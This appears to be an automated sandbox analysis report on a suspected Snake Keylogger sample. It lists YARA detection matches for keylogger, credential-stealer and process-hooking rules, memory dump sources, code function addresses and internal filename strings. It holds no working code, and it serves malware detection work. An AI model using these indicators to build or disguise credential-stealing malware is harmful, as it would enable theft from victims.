Source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.OtldpQxzAw.exe.4297268.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.OtldpQxzAw.exe.4297268.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.OtldpQxzAw.exe.4297268.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.OtldpQxzAw.exe.4253448.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.OtldpQxzAw.exe.4253448.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.OtldpQxzAw.exe.4253448.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.OtldpQxzAw.exe.4297268.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.OtldpQxzAw.exe.4297268.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.OtldpQxzAw.exe.4297268.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.OtldpQxzAw.exe.4253448.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.OtldpQxzAw.exe.4253448.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.OtldpQxzAw.exe.4253448.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000009.00000002.3301331554.000000000042E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.955729902.0000000004CB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.903173734.0000000004253000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.955729902.0000000004AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: OtldpQxzAw.exe PID: 6416, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: OtldpQxzAw.exe PID: 808, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: wiSeRRwvZHTk.exe PID: 2664, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\OtldpQxzAw.exe

Process Stats: CPU usage > 49%

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_00C1D3E4	0_2_00C1D3E4
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_026369B0	0_2_026369B0
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_02631C3F	0_2_02631C3F
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_02630040	0_2_02630040
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_026369A1	0_2_026369A1
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_0674E6F8	0_2_0674E6F8
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_06747CB8	0_2_06747CB8
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_06746D98	0_2_06746D98
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_0674CD80	0_2_0674CD80
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_06745B88	0_2_06745B88
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_0674E6E9	0_2_0674E6E9
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_06749F70	0_2_06749F70
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_06749F80	0_2_06749F80
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_0674D4C0	0_2_0674D4C0
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_0674D4B0	0_2_0674D4B0
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_06744C99	0_2_06744C99
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_0674CD6F	0_2_0674CD6F
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_0674A540	0_2_0674A540
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_06748D10	0_2_06748D10
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_06748D00	0_2_06748D00
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_0674D268	0_2_0674D268
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_0674D25B	0_2_0674D25B
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_0674A370	0_2_0674A370
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_06745B73	0_2_06745B73
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_06749B50	0_2_06749B50
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_0674EBD0	0_2_0674EBD0
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_0674EBC0	0_2_0674EBC0
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_06747BB7	0_2_06747BB7
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_06746399	0_2_06746399
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_0674A380	0_2_0674A380
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_0674D018	0_2_0674D018
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_0674E018	0_2_0674E018
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_0674D008	0_2_0674D008
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_0674E00B	0_2_0674E00B
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_0674A0F0	0_2_0674A0F0
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_0674A0E1	0_2_0674A0E1
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_06B92BC0	0_2_06B92BC0
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_06B96560	0_2_06B96560
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_06B98040	0_2_06B98040
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_06B96128	0_2_06B96128
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_06B96118	0_2_06B96118
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_06B95CF0	0_2_06B95CF0
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_06B95CE1	0_2_06B95CE1
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_06B97C08	0_2_06B97C08
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_06B92C0B	0_2_06B92C0B
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_06B998B1	0_2_06B998B1
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_010BC146	9_2_010BC146
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_010BA088	9_2_010BA088
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_010B5370	9_2_010B5370
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_010BD2CA	9_2_010BD2CA
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_010BD599	9_2_010BD599
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_010BC468	9_2_010BC468
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_010BC738	9_2_010BC738
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_010B69A0	9_2_010B69A0
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_010BCA08	9_2_010BCA08
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_010BEC18	9_2_010BEC18
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_010B6FC8	9_2_010B6FC8
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_010BCFF8	9_2_010BCFF8
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_010B3E09	9_2_010B3E09
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_010B39EE	9_2_010B39EE
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_010B29EC	9_2_010B29EC
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_010BF804	9_2_010BF804
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_010B3AA1	9_2_010B3AA1
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_010BEC0A	9_2_010BEC0A
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_010BFC49	9_2_010BFC49
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_06882A98	9_2_06882A98
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_068823B0	9_2_068823B0
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_068853B0	9_2_068853B0
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_06889FF8	9_2_06889FF8
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_068898D0	9_2_068898D0
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_06881C58	9_2_06881C58
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_0688EE80	9_2_0688EE80
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_0688EE90	9_2_0688EE90
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_068896B0	9_2_068896B0
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_0688F2D9	9_2_0688F2D9
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_0688F2E8	9_2_0688F2E8
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_0688EA28	9_2_0688EA28
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_0688EA38	9_2_0688EA38
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_0688FB8B	9_2_0688FB8B
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_0688FB98	9_2_0688FB98
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_06889F91	9_2_06889F91
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_068823AB	9_2_068823AB
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_068853AB	9_2_068853AB
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_06888F28	9_2_06888F28
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_06880B20	9_2_06880B20
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_06888F27	9_2_06888F27
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_06880B30	9_2_06880B30
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_0688F730	9_2_0688F730
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_0688F740	9_2_0688F740
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_0688D480	9_2_0688D480
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_0688D8D8	9_2_0688D8D8
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_0688D028	9_2_0688D028
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_0688003F	9_2_0688003F
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_06881C49	9_2_06881C49
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_06880040	9_2_06880040
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_0688D471	9_2_0688D471
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_0688E188	9_2_0688E188
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_0688E187	9_2_0688E187
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_0688E5D3	9_2_0688E5D3
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_0688E5E0	9_2_0688E5E0
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_0688DD21	9_2_0688DD21
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 9_2_0688DD30	9_2_0688DD30
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_01886F90	10_2_01886F90
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_0188D3E4	10_2_0188D3E4
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_057A69B0	10_2_057A69B0
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_057A0040	10_2_057A0040
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_057A0007	10_2_057A0007
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_057A69A1	10_2_057A69A1
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_074DE6F8	10_2_074DE6F8
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_074DCD80	10_2_074DCD80
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_074D6D98	10_2_074D6D98
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_074D7CB8	10_2_074D7CB8
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_074D5B88	10_2_074D5B88
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_074D9F70	10_2_074D9F70
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_074D9F80	10_2_074D9F80
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_074DE6E9	10_2_074DE6E9
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_074DA540	10_2_074DA540
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_074DCD6F	10_2_074DCD6F
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_074D8D00	10_2_074D8D00
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_074D8D10	10_2_074D8D10
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_074DD4C0	10_2_074DD4C0
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_074D4C99	10_2_074D4C99
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_074DD4B0	10_2_074DD4B0
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_074D9B50	10_2_074D9B50
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_074DA370	10_2_074DA370
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_074D5B72	10_2_074D5B72
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_074DEBC0	10_2_074DEBC0
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_074DEBD0	10_2_074DEBD0
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_074DA380	10_2_074DA380
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_074D6399	10_2_074D6399
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_074D7BB7	10_2_074D7BB7
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_074DD25A	10_2_074DD25A
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_074DD268	10_2_074DD268
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_074DD008	10_2_074DD008
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_074DE00A	10_2_074DE00A
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_074DD018	10_2_074DD018
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_074DE018	10_2_074DE018
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_074DA0E1	10_2_074DA0E1
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_074DA0F0	10_2_074DA0F0
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_07CA6551	10_2_07CA6551
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_07CA6560	10_2_07CA6560
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_07CA6128	10_2_07CA6128
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_07CA8040	10_2_07CA8040
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_07CA5CF0	10_2_07CA5CF0
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_07CA2C0A	10_2_07CA2C0A
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_07CA7C08	10_2_07CA7C08
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_07CA98B1	10_2_07CA98B1
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_030B5370	14_2_030B5370
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_030BD2CA	14_2_030BD2CA
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_030B7118	14_2_030B7118
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_030BC146	14_2_030BC146
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_030BA088	14_2_030BA088
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_030BC788	14_2_030BC788
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_030BD599	14_2_030BD599
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_030BCA58	14_2_030BCA58
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_030B69A0	14_2_030B69A0
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_030BCFF7	14_2_030BCFF7
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_030BCD28	14_2_030BCD28
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_030BEC18	14_2_030BEC18
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_030BF7F1	14_2_030BF7F1
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_030B3AA1	14_2_030B3AA1
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_030B39EE	14_2_030B39EE
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_030B29EC	14_2_030B29EC
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_030B3E09	14_2_030B3E09
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_030BEC0A	14_2_030BEC0A
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_030BFC49	14_2_030BFC49
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DA9FF8	14_2_06DA9FF8
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DA1C58	14_2_06DA1C58
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DA2A98	14_2_06DA2A98
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DA23B0	14_2_06DA23B0
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DA53B0	14_2_06DA53B0
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DA98D0	14_2_06DA98D0
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DAEE90	14_2_06DAEE90
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DAEE80	14_2_06DAEE80
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DA96B0	14_2_06DA96B0
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DA9F91	14_2_06DA9F91
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DAF740	14_2_06DAF740
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DA8F19	14_2_06DA8F19
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DAF730	14_2_06DAF730
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DA8F28	14_2_06DA8F28
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DAD480	14_2_06DAD480
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DA1C49	14_2_06DA1C49
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DAE5D1	14_2_06DAE5D1
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DAE5E0	14_2_06DAE5E0
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DADD30	14_2_06DADD30
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DADD21	14_2_06DADD21
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DAF2D9	14_2_06DAF2D9
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DAF2E8	14_2_06DAF2E8
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DAEA38	14_2_06DAEA38
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DAEA28	14_2_06DAEA28
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DAFB98	14_2_06DAFB98
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DAFB89	14_2_06DAFB89
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DA53A0	14_2_06DA53A0
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DA23A4	14_2_06DA23A4
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DA0B30	14_2_06DA0B30
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DA0B20	14_2_06DA0B20
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DAD8D8	14_2_06DAD8D8
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DAD8C8	14_2_06DAD8C8
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DA0040	14_2_06DA0040
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DAD017	14_2_06DAD017
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DA0007	14_2_06DA0007
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DAD028	14_2_06DAD028
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DAE188	14_2_06DAE188
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 14_2_06DAE187	14_2_06DAE187

Source: OtldpQxzAw.exe, 00000000.00000002.898859461.00000000006CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs OtldpQxzAw.exe
Source: OtldpQxzAw.exe, 00000000.00000002.903173734.0000000003ED2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs OtldpQxzAw.exe
Source: OtldpQxzAw.exe, 00000000.00000002.909489590.00000000070F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs OtldpQxzAw.exe
Source: OtldpQxzAw.exe, 00000000.00000002.901255150.00000000028EB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs OtldpQxzAw.exe
Source: OtldpQxzAw.exe, 00000000.00000000.836329494.00000000001E0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameRufU.exeB vs OtldpQxzAw.exe
Source: OtldpQxzAw.exe, 00000000.00000002.903173734.0000000004253000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs OtldpQxzAw.exe
Source: OtldpQxzAw.exe, 00000009.00000002.3302554896.0000000000CF7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs OtldpQxzAw.exe
Source: OtldpQxzAw.exe	Binary or memory string: OriginalFilenameRufU.exeB vs OtldpQxzAw.exe

Source: OtldpQxzAw.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

